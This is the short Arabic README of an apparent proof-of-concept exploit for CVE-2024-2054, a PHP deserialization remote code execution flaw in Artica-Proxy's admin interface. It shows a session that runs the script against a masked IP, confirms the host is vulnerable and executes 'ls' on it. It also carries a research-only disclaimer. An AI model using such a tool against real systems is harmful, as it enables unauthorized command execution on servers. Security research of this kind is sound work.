
استغلال إثبات المفهوم لـ CVE-2024-2054، يُظهِر استغلال إلغاء التسلسل غير الآمن (RCE) في تطبيق الويب الإداري Artica-Proxy. يتضمن تنفيذ الأوامر والتحقق من الثغرة.
إثبات مفهوم الاستغلال لتطبيق ARTICA PROXY الإداري على الويب CVE-2024-2054
مزيد من التفاصيل هنا: https://blog.sonicwall.com/en-us/2024/03/unpatched-php-deserialization-vulnerability-in-artica-proxy/
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
تم إنشاء هذا الإثبات لأغراض البحث الأكاديمي فقط وتطوير تقنيات دفاعية فعالة، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا إذن بذلك صراحة. منشئو/مشرفو المشروع ليسوا مسؤولين عن سوء استخدام البرنامج/الإثبات. استخدم بمسؤولية.